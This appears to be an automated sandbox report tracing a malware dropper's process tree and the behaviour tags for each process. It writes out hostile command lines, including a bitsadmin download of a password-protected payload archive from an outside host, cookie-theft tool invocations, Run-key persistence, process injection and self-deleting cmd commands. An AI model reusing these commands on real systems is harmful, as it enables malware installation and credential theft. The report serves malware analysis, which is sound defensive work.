PID 3920 wrote to memory of 208	3920	55CB4375683875666481DC417B20B757.exe	lylal220.exe
PID 3920 wrote to memory of 208	3920	55CB4375683875666481DC417B20B757.exe	lylal220.exe
PID 3920 wrote to memory of 208	3920	55CB4375683875666481DC417B20B757.exe	lylal220.exe
PID 3920 wrote to memory of 3656	3920	55CB4375683875666481DC417B20B757.exe	JoSetp.exe
PID 3920 wrote to memory of 3656	3920	55CB4375683875666481DC417B20B757.exe	JoSetp.exe
PID 3964 wrote to memory of 1956	3964	LabPicV3.exe	LabPicV3.tmp
PID 3964 wrote to memory of 1956	3964	LabPicV3.exe	LabPicV3.tmp
PID 3964 wrote to memory of 1956	3964	LabPicV3.exe	LabPicV3.tmp
PID 3920 wrote to memory of 928	3920	55CB4375683875666481DC417B20B757.exe	BarSetpFile.exe
PID 3920 wrote to memory of 928	3920	55CB4375683875666481DC417B20B757.exe	BarSetpFile.exe
PID 3920 wrote to memory of 1496	3920	55CB4375683875666481DC417B20B757.exe	LOQn7WyBrhly.exe
PID 3920 wrote to memory of 1496	3920	55CB4375683875666481DC417B20B757.exe	LOQn7WyBrhly.exe
PID 3920 wrote to memory of 1496	3920	55CB4375683875666481DC417B20B757.exe	LOQn7WyBrhly.exe
PID 208 wrote to memory of 716	208	lylal220.exe	lylal220.tmp
PID 208 wrote to memory of 716	208	lylal220.exe	lylal220.tmp
PID 208 wrote to memory of 716	208	lylal220.exe	lylal220.tmp
PID 2812 wrote to memory of 988	2812	guihuali-game.exe	WScript.exe
PID 2812 wrote to memory of 988	2812	guihuali-game.exe	WScript.exe
PID 2812 wrote to memory of 988	2812	guihuali-game.exe	WScript.exe
PID 2640 wrote to memory of 2328	2640	hjjgaa.exe	jfiag3g_gg.exe
PID 2640 wrote to memory of 2328	2640	hjjgaa.exe	jfiag3g_gg.exe
PID 2640 wrote to memory of 2328	2640	hjjgaa.exe	jfiag3g_gg.exe
PID 988 wrote to memory of 2800	988	WScript.exe	rundll32.exe
PID 988 wrote to memory of 2800	988	WScript.exe	rundll32.exe
PID 988 wrote to memory of 2800	988	WScript.exe	rundll32.exe
PID 928 wrote to memory of 2296	928	BarSetpFile.exe	2520276.exe
PID 928 wrote to memory of 2296	928	BarSetpFile.exe	2520276.exe
PID 928 wrote to memory of 2296	928	BarSetpFile.exe	2520276.exe
PID 3656 wrote to memory of 1280	3656	JoSetp.exe	7503414.exe
PID 3656 wrote to memory of 1280	3656	JoSetp.exe	7503414.exe
PID 3656 wrote to memory of 1280	3656	JoSetp.exe	7503414.exe
PID 3656 wrote to memory of 2444	3656	JoSetp.exe	3648716.exe
PID 3656 wrote to memory of 2444	3656	JoSetp.exe	3648716.exe
PID 3656 wrote to memory of 2444	3656	JoSetp.exe	3648716.exe
PID 928 wrote to memory of 388	928	BarSetpFile.exe	6876167.exe
PID 928 wrote to memory of 388	928	BarSetpFile.exe	6876167.exe
PID 928 wrote to memory of 388	928	BarSetpFile.exe	6876167.exe
PID 1956 wrote to memory of 2260	1956	LabPicV3.tmp	alpATCHInO.exe
PID 1956 wrote to memory of 2260	1956	LabPicV3.tmp	alpATCHInO.exe
PID 2800 wrote to memory of 1920	2800	rundll32.exe	svchost.exe
PID 716 wrote to memory of 4188	716	lylal220.tmp	ysAGEL.exe
PID 716 wrote to memory of 4188	716	lylal220.tmp	ysAGEL.exe
PID 2800 wrote to memory of 2852	2800	rundll32.exe	svchost.exe
PID 1920 wrote to memory of 4236	1920	svchost.exe	svchost.exe
PID 1920 wrote to memory of 4236	1920	svchost.exe	svchost.exe
PID 1920 wrote to memory of 4236	1920	svchost.exe	svchost.exe
PID 2800 wrote to memory of 1000	2800	rundll32.exe	svchost.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2620

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2628

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2424

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1844

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1252

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1232

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1080

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:860

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1000

C:\Users\Admin\AppData\Local\Temp\55CB4375683875666481DC417B20B757.exe
"C:\Users\Admin\AppData\Local\Temp\55CB4375683875666481DC417B20B757.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3920

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2640

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:2328

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4584

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3020

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:5080

C:\Windows\SysWOW64\taskkill.exe
taskkill /im RunWW.exe /f
4⤵
- Kills process with taskkill
PID:4268

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:4592

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
2⤵
- Executes dropped EXE
PID:3776

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3108

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3964

C:\Users\Admin\AppData\Local\Temp\is-SGRAQ.tmp\LabPicV3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SGRAQ.tmp\LabPicV3.tmp" /SL5="$10206,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1956

C:\Users\Admin\AppData\Local\Temp\is-N099K.tmp\alpATCHInO.exe
"C:\Users\Admin\AppData\Local\Temp\is-N099K.tmp\alpATCHInO.exe" /S /UID=lab214
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2260

C:\Program Files\Windows Photo Viewer\MQJLMAMIIG\prolab.exe
"C:\Program Files\Windows Photo Viewer\MQJLMAMIIG\prolab.exe" /VERYSILENT
5⤵
- Executes dropped EXE
PID:3996

C:\Users\Admin\AppData\Local\Temp\is-BEJPA.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BEJPA.tmp\prolab.tmp" /SL5="$B005A,575243,216576,C:\Program Files\Windows Photo Viewer\MQJLMAMIIG\prolab.exe" /VERYSILENT
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3888

C:\Users\Admin\AppData\Local\Temp\d0-e5a41-704-400a3-f0cbecca760dc\Wibekizheny.exe
"C:\Users\Admin\AppData\Local\Temp\d0-e5a41-704-400a3-f0cbecca760dc\Wibekizheny.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4680

C:\Users\Admin\AppData\Local\Temp\d7-e4561-709-c05a9-d68eecb34408e\Kudyhuvaqae.exe
"C:\Users\Admin\AppData\Local\Temp\d7-e4561-709-c05a9-d68eecb34408e\Kudyhuvaqae.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1816

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0a0ci4fw.htl\gpooe.exe & exit
6⤵
PID:1364

C:\Users\Admin\AppData\Local\Temp\0a0ci4fw.htl\gpooe.exe
C:\Users\Admin\AppData\Local\Temp\0a0ci4fw.htl\gpooe.exe
7⤵
- Executes dropped EXE
PID:5168

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
8⤵
- Executes dropped EXE
PID:5396

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
8⤵
- Executes dropped EXE
PID:5760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g3x4jjcg.2ea\google-game.exe & exit
6⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\g3x4jjcg.2ea\google-game.exe
C:\Users\Admin\AppData\Local\Temp\g3x4jjcg.2ea\google-game.exe
7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2892

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\patch.dll",patch
8⤵
- Loads dropped DLL
PID:4224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3tvlwpjx.zhq\askinstall31.exe & exit
6⤵
PID:5300

C:\Users\Admin\AppData\Local\Temp\3tvlwpjx.zhq\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\3tvlwpjx.zhq\askinstall31.exe
7⤵
- Executes dropped EXE
PID:5560

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
8⤵
PID:6508

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
9⤵
- Kills process with taskkill
PID:6976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgdw21ob.4ze\y1.exe & exit
6⤵
PID:6820

C:\Users\Admin\AppData\Local\Temp\pgdw21ob.4ze\y1.exe
C:\Users\Admin\AppData\Local\Temp\pgdw21ob.4ze\y1.exe
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7028

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\pgdw21ob.4ze\y1.exe"
8⤵
PID:3336

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
9⤵
- Delays execution with timeout.exe
PID:5892

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zg5mbowr.ucu\setup_10.2_mix.exe & exit
6⤵
PID:6716

C:\Users\Admin\AppData\Local\Temp\zg5mbowr.ucu\setup_10.2_mix.exe
C:\Users\Admin\AppData\Local\Temp\zg5mbowr.ucu\setup_10.2_mix.exe
7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "
8⤵
- Checks computer location settings
PID:4308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n0iiasex.cvh\toolspab1.exe & exit
6⤵
PID:5128

C:\Users\Admin\AppData\Local\Temp\n0iiasex.cvh\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\n0iiasex.cvh\toolspab1.exe
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6984

C:\Users\Admin\AppData\Local\Temp\n0iiasex.cvh\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\n0iiasex.cvh\toolspab1.exe
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2152

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3wnkl3t3.exu\GcleanerWW.exe /mixone & exit
6⤵
PID:6136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\le3rhmbb.1ld\SunLabsPlayer.exe /S & exit
6⤵
PID:4500

C:\Users\Admin\AppData\Local\Temp\le3rhmbb.1ld\SunLabsPlayer.exe
C:\Users\Admin\AppData\Local\Temp\le3rhmbb.1ld\SunLabsPlayer.exe /S
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:6584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:4936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:6352

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:3760

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:4732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:6640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:5492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:7044

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
8⤵
- Download via BitsAdmin
PID:6748

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pDt6jSNcZxeVPrNO -y x C:\zip.7z -o"C:\Program Files\temp_files\"
8⤵
PID:5972

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pWpIalMzwHLWFuk9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
8⤵
PID:4108

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:7004

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:1644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:5640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:6880

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AluokRqxGvyM\AluokRqxGvyM.dll" AluokRqxGvyM
8⤵
PID:2460

C:\Windows\system32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\AluokRqxGvyM\AluokRqxGvyM.dll" AluokRqxGvyM
9⤵
PID:1172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:4900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:5328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:5668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:6724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqFA93.tmp\tempfile.ps1"
8⤵
PID:4072

C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
8⤵
PID:5628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ct3ubhmy.5ex\df4e3841.exe & exit
6⤵
PID:6952

C:\Users\Admin\AppData\Local\Temp\ct3ubhmy.5ex\df4e3841.exe
C:\Users\Admin\AppData\Local\Temp\ct3ubhmy.5ex\df4e3841.exe
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:2160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oie52pjd.0x1\app.exe /8-2222 & exit
6⤵
PID:4716

C:\Users\Admin\AppData\Local\Temp\oie52pjd.0x1\app.exe
C:\Users\Admin\AppData\Local\Temp\oie52pjd.0x1\app.exe /8-2222
7⤵
- Executes dropped EXE
PID:4124

C:\Users\Admin\AppData\Local\Temp\oie52pjd.0x1\app.exe
"C:\Users\Admin\AppData\Local\Temp\oie52pjd.0x1\app.exe" /8-2222
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:7152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 832
8⤵
- Program crash
PID:7076

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:208

C:\Users\Admin\AppData\Local\Temp\is-44NSP.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-44NSP.tmp\lylal220.tmp" /SL5="$1020C,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:716

C:\Users\Admin\AppData\Local\Temp\is-I1HOD.tmp\ysAGEL.exe
"C:\Users\Admin\AppData\Local\Temp\is-I1HOD.tmp\ysAGEL.exe" /S /UID=lylal220
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4188

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3656

C:\ProgramData\7503414.exe
"C:\ProgramData\7503414.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1280

C:\ProgramData\3648716.exe
"C:\ProgramData\3648716.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2444

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:4256

C:\ProgramData\1706868.exe
"C:\ProgramData\1706868.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4352

C:\ProgramData\1706868.exe
"{path}"
4⤵
- Executes dropped EXE
PID:6620

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3656 -s 1756
3⤵
- Program crash
PID:1808

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:928

C:\ProgramData\2520276.exe
"C:\ProgramData\2520276.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2296

C:\ProgramData\6876167.exe
"C:\ProgramData\6876167.exe"
3⤵
- Executes dropped EXE
PID:388

C:\ProgramData\7945204.exe
"C:\ProgramData\7945204.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4392

C:\ProgramData\7945204.exe
"{path}"
4⤵
- Executes dropped EXE
PID:6628

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:988

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
4⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800

C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LOQn7WyBrhly.exe
"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LOQn7WyBrhly.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1496

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
3⤵
PID:6136

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4236

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5656

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5596

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:6104

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6344

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6100

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5192

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4872

C:\Users\Admin\AppData\Local\Temp\6CF3.exe
C:\Users\Admin\AppData\Local\Temp\6CF3.exe
1⤵
PID:6976

C:\Users\Admin\AppData\Local\Temp\6F17.exe
C:\Users\Admin\AppData\Local\Temp\6F17.exe
1⤵
PID:5776

C:\Users\Admin\AppData\Local\Temp\86A7.exe
C:\Users\Admin\AppData\Local\Temp\86A7.exe
1⤵
PID:5224

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\86A7.exe"
2⤵
PID:6376

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
3⤵
- Delays execution with timeout.exe
PID:5876

C:\Users\Admin\AppData\Local\Temp\8D5F.exe
C:\Users\Admin\AppData\Local\Temp\8D5F.exe
1⤵
PID:5064

C:\Users\Admin\AppData\Local\Temp\617dbf8e-aa50-42a9-bff0-e342f693df34\AdvancedRun.exe
